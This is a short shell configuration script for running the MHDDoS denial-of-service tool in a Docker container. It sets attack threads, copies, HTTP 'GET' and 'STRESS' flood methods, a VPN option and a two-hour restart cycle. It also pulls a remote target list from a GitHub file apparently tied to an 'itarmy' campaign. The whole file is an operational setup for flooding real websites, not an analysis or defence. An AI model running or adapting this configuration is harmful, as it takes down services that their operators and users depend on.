CONTAINER_NAME=mhddos
DOCKER_OPTIONS="-it --rm --pull always --log-driver none --name $CONTAINER_NAME"

if [[ $LITE ]]
then
  THREADS=1000
  COPIES=1
  DOCKER_OPTIONS="--cpus=.8 $DOCKER_OPTIONS"
else
  THREADS=4000
  COPIES=2
fi

ATTACK_OPTIONS="--http-methods GET STRESS -t $THREADS --copies $COPIES --vpn"

TARGETS_URL=https://raw.githubusercontent.com/psyipm/itarmy/main/targets.lst

RESTART_IN=7200 # 2 hours
